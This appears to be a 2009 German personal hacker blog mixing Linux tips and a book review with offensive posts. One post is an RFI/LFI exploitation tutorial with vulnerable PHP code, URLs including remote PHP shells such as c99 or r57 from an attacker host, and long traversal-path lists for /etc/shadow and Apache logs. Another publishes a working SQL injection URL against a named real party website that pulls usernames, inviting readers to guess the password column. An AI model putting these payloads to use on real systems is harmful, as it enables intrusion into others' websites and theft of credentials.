Transparente Konsole (Looks Pretty Cool! yeah!)

März 10, 2009

Heute mal wieder mit Fluxbox experimentiert, und direkt gedacht:

„Ah, ein Transparenter Terminal muss her!“

So wie gedacht, habe ich das auch gemacht:

Transparenter Eterm

Transparenter Eterm

Funktionieren tut das ganze, durch den  Eterm..

Aufruf:

Eterm –trans -x –shade=0 –scrollbar=0 –buttonbar=0 –geometry=80×52+30+30 –foreground-color=green

Wirklich Cool ;).

GreeZ

Advertisements

Rapidshare@wget

März 7, 2009

Rapidshare kann man nicht nur über den Webbrowser Downloaden, sondern auch über die Shell. Zu verdanken haben wir  dies dem Programm wget, welches auf jedem Unixoiden Betriebsystem vorhanden ist.

wget –http-user=USERNAME –http-passwd=PASSWORD http://rapidshare.com/filetodownload

Und falls man mehrere Dateien downloaden möchte, kopiert man sich alle Links in eine Textdatei und fügt den Parameter -i und ebenso die Liste an.

wget –http-user=USERNAME –http-passwd=PASSWORD -i links.txt

Yakuake Terminal Emulator

März 7, 2009

Habe eben einen coolen Terminal Emulator für Linux Entdeckt, anders als bei Gome Terminal und Co, nimmt bei Yakuake dem Desktop keinen Platz weg. Er wird einfach eingefahren, und mit der „F12“ (Oder einem anderen, einstellbaren Shortcut) wieder angezeigt. Wie meist nicht anders, ist eine Register Funktion für mehrere Shells, auch mit dabei.

Leider werden dafür wohl auch die KDE Libs benötigt, was ich nicht so toll finde. :/

Yakuake Screenshot (Quelle: Google.de)

Yakuake Screenshot (Quelle: Google.de)

More: yakuake.kde.org

Wirklich nett, und vorallem nützlich 😛


RFI/LFI Start Up!

März 7, 2009

Ein schon etwas älteres Paper von mir, in diesem ich die Ausnutzung von Remote & Local File Inclusions erkläre.

Remote/Local File Inclusion Tutorial

1.] Was sind Remote/Local File Inclusions?
2.] Wie funktioniert es?
2.] Ein verwundbarer Code
3.] Beispiele
4.] LFI: Tipps
5.] RFI: Tipps
6.] Wie finde ich LFI / RFI Lücken?

In diesem Tutorial werden euch grundsätzlich die Basics zu Remote & Local File Inclusion erläutert.
Um näher an die Materie zu kommen, müsst ihr euch mit diesem Tutorial auseinandersetzen und herumprobieren.
Spielen, learning by doing.

Was sind Remote File Inclusions?

Ausführungen von unkontrolliertem Schadcode in (meist) PHP Software.
Angriffe geschehen meistens über unvalidierte Parameter in $_GET*-Form (get-Parameter).

*Ein in der Sprache PHP genannter GET Parameter ist Folgendes, wie ihr es aus vielen Seiten kennt:

Bsp.: http://vuln.com/phpscript/index.php?site=

Als Schadcode wäre z.B eine PHP-Shell (c99,r57) zu bezeichnen.

Wie funktioniert es?

Eine Remote File Inclusion funktioniert überall dort, wo auch ein unvalidierter und damit verwundbarer Parameter vorhanden ist.

Was sind Local File Inclusions?

Local File Inclusions funktionieren ähnlich wie RFIs, durch verwundbare Parameter, jedoch können nur lokale Dateien eingebunden und aufgerufen werden. Dies macht es für einen Angreifer z.B bei Unix Servern interessant, da dort eine password-Datei im Verzeichnis /etc/shadow vorhanden ist.
Bei noch zuvorkommender Fehlkonfiguration sind die root-Daten schnell für den Angreifer auslesbar. Natürlich lassen sich auch andere Dateien damit auslesen, wie z.B. bei Apache Servern die Error Logs (mehr dazu unter TIPPS).

Ein verwundbarer Code

Für jeden PHP Programmierer ist das Sicherheitsdenken am Wichtigsten.

Ein verwundbarer Programmcode in PHP, mit dem eine File Inclusion möglich wäre, würde so aussehen:

<?php
$datei = (empty($_GET[’site‘]) == false) ? $_GET[’site‘] : ‚0‘;
$datei = ‚.php‘;
include($datei);
?>

In unserem Webbrowser würde dies so aussehen:

http://site.com/phpscript/site.php?site=

Der Angreifer würde die ungeschützte URL so ausnutzen:

http://site.com/phpscript/site.php?s…com/shell.txt?

Die Shell muss in TXT form auf eurem Server liegen, da sie sonst eventuell nicht richtig vom anderen Server ausgeführt (interpretiert) wird.

Also würde über

http://site.com/phpscript/site.php?site=http://hackme.com/shell.txt?&#8220;

der Schadcode in http://hackme.com/shell.txt? auf unserem verwundbaren Server ausgeführt werden.

LFI: Tipps

Bei LFIs lassen sich z.B. Rootverzeichnisse überspringen, indem man ein ../ setzt. Diese Punkte bedeuten, dass dort das jeweilige Verzeichnis übersprungen wird. Dadurch können wir meist, bei vollen Rechten, jeden entsprechenden Serverpfad aufrufen und uns so zu vielen Dateien Einblick verschaffen.
Die password-Datei eines Linuxservers befindet sich meistens im Pfad etc/pwd oder etc/passwd. Dies ist jedoch von Server zu Server unterschiedlich, manchmal ist es auch ../etc/pwd oder auch ../../etc/pwd oder auch manchmal var/etc/pwd. Da gilt es nur, herumzuprobieren.
Bei neueren Servern befinden sich in der pwd Datei allerdings nur die User, um an die Passwörter heranzukommen müssen wir an die Shadow-Datei herankommen.
Dazu nehmen wir die Datei etc/shadow, die alle Passwörter enthält. Der Pfad kann wie oben leicht variieren.

RFI: Tipps

Wenn man eine RFI Lücke gefunden hat, kann man diese am besten mit einer Shell ausnutzen. Im Internet findet man genug Shells wie c99, r57. Das sind PHP-Skripte und werden auf einen Webspace hochgeladen. Mit der RFI-Lücke inkludieren wir dann die Shell in die Originalseite, wie man es mit dem PHP-Befehl include() tut. So hat man die komplette Kontrolle über die Internet-Seite. Man kann mit einer Shell Dateien löschen, Datenbanken auslesen, etc.

Pfade, die für eine Local/Remote Inclusion relevant sein können:

(Unix Benutzer- und Passwortfiles.)

/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

(Apache Error Log Pfade

../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log

Wie finde ich LFI / RFI Lücken?

LFI:
Hierzu sucht man nach dem gewöhnlichen Muster, wie z.B. bei einer SQL Injection.
z.B. index.php?site=
Wir können es also Versuchen und fügen dann ../ hinzu.
z.B. index.php?site=../
Bekommen wir dadurch einen Fehler oder springen auf eine andere Seite, wo wir vorher waren, ist die Chance recht groß, dass man eine LFI Lücke gefunden hat.

RFI:
Hierzu sucht man nach dem gewöhnlichen Muster, wie z.B. bei einer SQL Injection und/oder LFI.
z.B. index.php?site=
Um zu sehen ob fremde Seiten eingefügt werden können, benutzen wir ganz einfach Google. Wir hängen also http://www.google.de an.
z.B. index.php?site=http://www.google.de
Es klingt zwar verrückt, aber wenn wir jetzt Google sehen, haben wir eine RFI Lücke gefunden, das können wir dann mit einer Shell ausbauen. Das funktioniert übrigens auch mit jeder anderen Internetseite!


Dan Brown – Meteor

März 7, 2009
Dan Browns Meteor

Dan Brown's Meteor

Da ich gelegentlich auch mal ein Buch lese, kann jedem nur empfehlen diesen Thriller zu wählen ;).

Die Geschichte handelt von der Angeschlagenen NASA, diese einen Sensationelle Fund im Arktischen Eis macht. Tief versteckt liegt ein Meteorit dieser eine Außerirdische Lebensform birgt. Jedoch stellt sich dies bald als Mörderische Verschwörung heraus.

Meine Meinung: Wiedermal eine von beginn an Spannende und vorallem nicht unbedingt unrealistische Geschichte von Dan Brown

  • ISBN-10: 3404150554

Cdu-Ravensburg SQL Injection

März 7, 2009

Nicht nur unsere Regierung ist sich nicht sicher, sondern auch ihre Partei Webseiten. 😀

http://www.cdu-ravensburg.de/?content=partei/stadtver.php&auswahl=-1+union+select+1,username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users/*

Fehlt nur noch einer der die Password Spalte/Tabelle ratet.


Unix Socks5 with mocks…

März 6, 2009

In diesem Tutorial erlaütere ich, wie man einen Socks5 Server auf Unix basis Installiert und einrichtet.

http://nopaste.org/p/aW3VKtqDI

Viel Spaß damit 😛


yet another blacky blog

März 6, 2009

Wieder mal ein Blog von mir ;-). Leute die mich kennen sollten wissen, das dieser nicht der erste ist.

Dieser Blog dient nicht nur als Informations Seite, sondern auch als eine art Notizblock für mich :-P. Ich werde versuchen viele Updates zu geben.

Ich hoffe das ihr öfters mal vorbeischaut ;-).

GreeZ

int_


Hello world!

Februar 21, 2009

Welcome to WordPress.com. This is your first post. Edit or delete it and start blogging!